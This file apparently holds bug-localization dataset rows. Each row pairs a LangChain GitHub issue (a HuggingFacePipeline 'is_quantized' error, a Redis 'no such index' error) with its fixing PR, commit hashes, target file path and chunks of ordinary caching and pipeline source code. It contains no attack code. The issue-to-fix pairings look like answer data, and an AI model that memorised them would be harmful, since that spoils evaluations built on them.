LangChain: langchain-0.0.314
Python: Anaconda Python 3.9.18
X86
RTX3080 Laptop (16G)
CUDA 11.8
cuDNN 8.9.5
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1.git clone https://github.com/ymcui/Chinese-LLaMA-Alpaca-2.git
2.cd Chinese-LLaMA-Alpaca-2/scripts/langchain
3.python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
(langchain) zhanghui@zhanghui-OMEN-by-HP-Laptop-17-ck0xxx:~/Chinese-LLaMA-Alpaca-2/scripts/langchain$ python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/__init__.py:39: UserWarning: Importing HuggingFacePipeline from langchain root module is no longer supported.
warnings.warn(
loading LLM...
Loading checkpoint shards: 100%|███████████████████████████████████████████████████████████████████████████████| 2/2 [00:03<00:00, 1.86s/it]
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:362: UserWarning: `do_sample` is set to `False`. However, `temperature` is set to `0.9` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `temperature`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
warnings.warn(
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:367: UserWarning: `do_sample` is set to `False`. However, `top_p` is set to `0.6` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `top_p`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
warnings.warn(
Traceback (most recent call last):
File "/home/zhanghui/Chinese-LLaMA-Alpaca-2/scripts/langchain/langchain_sum.py", line 50, in <module>
model = HuggingFacePipeline.from_model_id(model_id=model_path,
File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/llms/huggingface_pipeline.py", line 112, in from_model_id
model.is_quantized
File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/torch/nn/modules/module.py", line 1614, in __getattr__
raise AttributeError("'{}' object has no attribute '{}'".format(
AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized'
### Expected behavior

| https://github.com/langchain-ai/langchain/issues/11809 | https://github.com/langchain-ai/langchain/pull/11891 | efa9ef75c098e23f00f95be73c39ae66fdb1c082 | 5019f59724b2b6adf840b78019f2581546cb390d | "2023-10-14T13:46:33Z" | python | "2023-10-16T23:54:20Z" | libs/langchain/langchain/llms/huggingface_pipeline.py | != ReturnType.NEW_TEXT
)
except Exception as e:
logger.warning(
f"Unable to extract pipeline return_type. "
f"Received error:\n\n{e}"
)
remove_prompt = True
if remove_prompt:
text = response["generated_text"][len(batch_prompts[j]) :]
else:
text = response["generated_text"]
elif self.pipeline.task == "text2text-generation":
text = response["generated_text"]
elif self.pipeline.task == "summarization":
text = response["summary_text"]
else:
raise ValueError(
f"Got invalid task {self.pipeline.task}, "
f"currently only {VALID_TASKS} are supported"
)
if stop:
text = enforce_stop_tokens(text, stop)
text_generations.append(text)
return LLMResult(
generations=[[Generation(text=text)] for text in text_generations]
) |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """
.. warning::
Beta Feature!
**Cache** provides an optional caching layer for LLMs.
Cache is useful for two reasons:
- It can save you money by reducing the number of API calls you make to the LLM
provider if you're often requesting the same completion multiple times.
- It can speed up your application by reducing the number of API calls you make
to the LLM provider.
Cache directly competes with Memory. See documentation for Pros and Cons.
**Class hierarchy:**
.. code-block::
BaseCache --> <name>Cache # Examples: InMemoryCache, RedisCache, GPTCache
"""
from __future__ import annotations
import hashlib
import inspect
import json
import logging
import uuid
import warnings
from datetime import timedelta
from functools import lru_cache
from typing import (
TYPE_CHECKING, |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | Any,
Callable,
Dict,
List,
Optional,
Tuple,
Type,
Union,
cast,
)
from sqlalchemy import Column, Integer, Row, String, create_engine, select
from sqlalchemy.engine.base import Engine
from sqlalchemy.orm import Session
try:
from sqlalchemy.orm import declarative_base
except ImportError:
from sqlalchemy.ext.declarative import declarative_base
from langchain.llms.base import LLM, get_prompts
from langchain.load.dump import dumps
from langchain.load.load import loads
from langchain.schema import ChatGeneration, Generation
from langchain.schema.cache import RETURN_VAL_TYPE, BaseCache
from langchain.schema.embeddings import Embeddings
from langchain.utils import get_from_env
from langchain.vectorstores.redis import Redis as RedisVectorstore
logger = logging.getLogger(__file__)
if TYPE_CHECKING:
import momento
from cassandra.cluster import Session as CassandraSession
def _hash(_input: str) -> str: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """Use a deterministic hashing approach."""
return hashlib.md5(_input.encode()).hexdigest()
def _dump_generations_to_json(generations: RETURN_VAL_TYPE) -> str:
"""Dump generations to json.
Args:
generations (RETURN_VAL_TYPE): A list of language model generations.
Returns:
str: Json representing a list of generations.
Warning: would not work well with arbitrary subclasses of `Generation`
"""
return json.dumps([generation.dict() for generation in generations])
def _load_generations_from_json(generations_json: str) -> RETURN_VAL_TYPE:
"""Load generations from json.
Args:
generations_json (str): A string of json representing a list of generations.
Raises:
ValueError: Could not decode json string to list of generations.
Returns:
RETURN_VAL_TYPE: A list of generations.
Warning: would not work well with arbitrary subclasses of `Generation`
"""
try:
results = json.loads(generations_json)
return [Generation(**generation_dict) for generation_dict in results]
except json.JSONDecodeError:
raise ValueError(
f"Could not decode json to list of generations: {generations_json}"
)
def _dumps_generations(generations: RETURN_VAL_TYPE) -> str: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """
Serialization for generic RETURN_VAL_TYPE, i.e. sequence of `Generation`
Args:
generations (RETURN_VAL_TYPE): A list of language model generations.
Returns:
str: a single string representing a list of generations.
This function (+ its counterpart `_loads_generations`) rely on
the dumps/loads pair with Reviver, so are able to deal
with all subclasses of Generation.
Each item in the list can be `dumps`ed to a string,
then we make the whole list of strings into a json-dumped.
"""
return json.dumps([dumps(_item) for _item in generations])
def _loads_generations(generations_str: str) -> Union[RETURN_VAL_TYPE, None]:
"""
Deserialization of a string into a generic RETURN_VAL_TYPE |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | (i.e. a sequence of `Generation`).
See `_dumps_generations`, the inverse of this function.
Args:
generations_str (str): A string representing a list of generations.
Compatible with the legacy cache-blob format
Does not raise exceptions for malformed entries, just logs a warning
and returns none: the caller should be prepared for such a cache miss.
Returns:
RETURN_VAL_TYPE: A list of generations.
"""
try:
generations = [loads(_item_str) for _item_str in json.loads(generations_str)]
return generations
except (json.JSONDecodeError, TypeError):
pass
try:
gen_dicts = json.loads(generations_str)
generations = [Generation(**generation_dict) for generation_dict in gen_dicts]
logger.warning(
f"Legacy 'Generation' cached blob encountered: '{generations_str}'"
)
return generations
except (json.JSONDecodeError, TypeError):
logger.warning(
f"Malformed/unparsable cached blob encountered: '{generations_str}'"
)
return None
class InMemoryCache(BaseCache): |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """Cache that stores things in memory."""
def __init__(self) -> None:
"""Initialize with empty cache."""
self._cache: Dict[Tuple[str, str], RETURN_VAL_TYPE] = {}
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]:
"""Look up based on prompt and llm_string."""
return self._cache.get((prompt, llm_string), None)
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None:
"""Update cache based on prompt and llm_string."""
self._cache[(prompt, llm_string)] = return_val
def clear(self, **kwargs: Any) -> None:
"""Clear cache."""
self._cache = {}
Base = declarative_base()
class FullLLMCache(Base):
"""SQLite table for full LLM Cache (all generations)."""
__tablename__ = "full_llm_cache"
prompt = Column(String, primary_key=True)
llm = Column(String, primary_key=True)
idx = Column(Integer, primary_key=True)
response = Column(String)
class SQLAlchemyCache(BaseCache):
"""Cache that uses SQAlchemy as a backend."""
def __init__(self, engine: Engine, cache_schema: Type[FullLLMCache] = FullLLMCache): |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """Initialize by creating all tables."""
self.engine = engine
self.cache_schema = cache_schema
self.cache_schema.metadata.create_all(self.engine)
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]:
"""Look up based on prompt and llm_string."""
stmt = (
select(self.cache_schema.response)
.where(self.cache_schema.prompt == prompt)
.where(self.cache_schema.llm == llm_string)
.order_by(self.cache_schema.idx)
)
with Session(self.engine) as session:
rows = session.execute(stmt).fetchall()
if rows:
try:
return [loads(row[0]) for row in rows]
except Exception:
logger.warning(
"Retrieving a cache value that could not be deserialized "
"properly. This is likely due to the cache being in an "
"older format. Please recreate your cache to avoid this "
"error."
)
return [Generation(text=row[0]) for row in rows]
return None
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """Update based on prompt and llm_string."""
items = [
self.cache_schema(prompt=prompt, llm=llm_string, response=dumps(gen), idx=i)
for i, gen in enumerate(return_val)
]
with Session(self.engine) as session, session.begin():
for item in items:
session.merge(item)
def clear(self, **kwargs: Any) -> None:
"""Clear cache."""
with Session(self.engine) as session:
session.query(self.cache_schema).delete()
session.commit()
class SQLiteCache(SQLAlchemyCache):
"""Cache that uses SQLite as a backend."""
def __init__(self, database_path: str = ".langchain.db"):
"""Initialize by creating the engine and all tables."""
engine = create_engine(f"sqlite:///{database_path}")
super().__init__(engine)
class UpstashRedisCache(BaseCache): |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """Cache that uses Upstash Redis as a backend."""
def __init__(self, redis_: Any, *, ttl: Optional[int] = None):
"""
Initialize an instance of UpstashRedisCache.
This method initializes an object with Upstash Redis caching capabilities.
It takes a `redis_` parameter, which should be an instance of an Upstash Redis
client class, allowing the object to interact with Upstash Redis
server for caching purposes.
Parameters:
redis_: An instance of Upstash Redis client class
(e.g., Redis) used for caching.
This allows the object to communicate with
Redis server for caching operations on.
ttl (int, optional): Time-to-live (TTL) for cached items in seconds.
If provided, it sets the time duration for how long cached
items will remain valid. If not provided, cached items will not
have an automatic expiration.
"""
try:
from upstash_redis import Redis
except ImportError:
raise ValueError(
"Could not import upstash_redis python package. "
"Please install it with `pip install upstash_redis`."
)
if not isinstance(redis_, Redis):
raise ValueError("Please pass in Upstash Redis object.")
self.redis = redis_
self.ttl = ttl
def _key(self, prompt: str, llm_string: str) -> str: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """Compute key from prompt and llm_string"""
return _hash(prompt + llm_string)
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]:
"""Look up based on prompt and llm_string."""
generations = []
results = self.redis.hgetall(self._key(prompt, llm_string))
if results:
for _, text in results.items():
generations.append(Generation(text=text))
return generations if generations else None
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """Update cache based on prompt and llm_string."""
for gen in return_val:
if not isinstance(gen, Generation):
raise ValueError(
"UpstashRedisCache supports caching of normal LLM generations, "
f"got {type(gen)}"
)
if isinstance(gen, ChatGeneration):
warnings.warn(
"NOTE: Generation has not been cached. UpstashRedisCache does not"
" support caching ChatModel outputs."
)
return
key = self._key(prompt, llm_string)
mapping = {
str(idx): generation.text for idx, generation in enumerate(return_val)
}
self.redis.hset(key=key, values=mapping)
if self.ttl is not None:
self.redis.expire(key, self.ttl)
def clear(self, **kwargs: Any) -> None: |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """
Clear cache. If `asynchronous` is True, flush asynchronously.
This flushes the *whole* db.
"""
asynchronous = kwargs.get("asynchronous", False)
if asynchronous:
asynchronous = "ASYNC"
else:
asynchronous = "SYNC"
self.redis.flushdb(flush_type=asynchronous)
class RedisCache(BaseCache): |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:

### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction

The error is here:

If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """Cache that uses Redis as a backend."""
